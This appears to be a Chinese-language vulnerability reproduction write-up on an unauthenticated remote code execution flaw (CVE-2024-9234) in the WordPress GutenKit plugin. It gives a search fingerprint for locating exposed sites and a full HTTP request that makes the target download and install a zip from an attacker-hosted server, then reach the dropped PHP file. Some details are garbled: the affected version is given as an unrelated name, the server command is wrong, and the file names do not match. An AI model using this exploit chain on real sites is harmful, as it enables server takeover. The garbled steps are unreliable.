登录 白背景

Wordpress GutenKit插件存在RCE漏洞(CVE-2024-9234)

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>

<font style="color:rgb(51, 51, 51);">WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。Wordpress GutenKit插件存在RCE漏洞(CVE-2024-9234)</font>

<font style="color:rgb(38, 38, 38);">二、影响版本</font>

  • <font style="color:rgb(38, 38, 38);">WordPress Recall</font>

<font style="color:rgb(38, 38, 38);">三、资产测绘</font>

body="wp-content/plugins/gutenkit-blocks-addon"
  • 特征

1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec.png

四、漏洞复现

创建一个1.php的文件,内容为

<?php phpinfo();?>

1729185767676-979b5400-927c-4cfe-9a04-bafd9a32e200.png

将其上传至vps,然后开启http服务

python3 -m httpserver 8899

1729186554769-13f972b0-04e6-49b9-a0ab-998af4462a6a.png

执行如下POC

POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
plugin=http://127.0.0.1:8899/1.zip

成功时会回显:<font style="color:rgba(0, 0, 0, 0.9);">The plugin directory does not exist after unzipping</font>

随后访问如下地址即可访问上传的php文件

/wp-content/plugins/1.php

原文: https://www.yuque.com/xiaokp7/ocvun2/kgq8x72os10i2rs6